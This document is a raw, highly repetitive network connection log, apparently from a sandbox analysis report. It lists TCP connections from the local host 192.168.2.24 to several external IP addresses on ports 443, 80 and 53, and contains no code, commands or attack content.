Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:64066
Source: global trafficTCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:64066
Source: global trafficTCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.24:64066
Source: global trafficTCP traffic: 192.168.2.24:64066 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.24:63564
Source: global trafficTCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.24:63564
Source: global trafficTCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53
Source: global trafficTCP traffic: 162.159.36.2:53 -> 192.168.2.24:63564
Source: global trafficTCP traffic: 192.168.2.24:63564 -> 162.159.36.2:53
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 3.39.89.152:443 -> 192.168.2.24:63570
Source: global trafficTCP traffic: 192.168.2.24:63570 -> 3.39.89.152:443
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 172.245.191.88:80 -> 192.168.2.24:63571
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.24:63571 -> 172.245.191.88:80
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63575
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63576
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63575
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63576
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63575
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63575 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63575
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63576
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 192.168.2.24:63576 -> 13.107.246.60:443
Source: global trafficTCP traffic: 13.107.246.60:443 -> 192.168.2.24:63576
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 192.168.2.24:63582 -> 2.22.242.113:443
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
Source: global trafficTCP traffic: 2.22.242.113:443 -> 192.168.2.24:63582
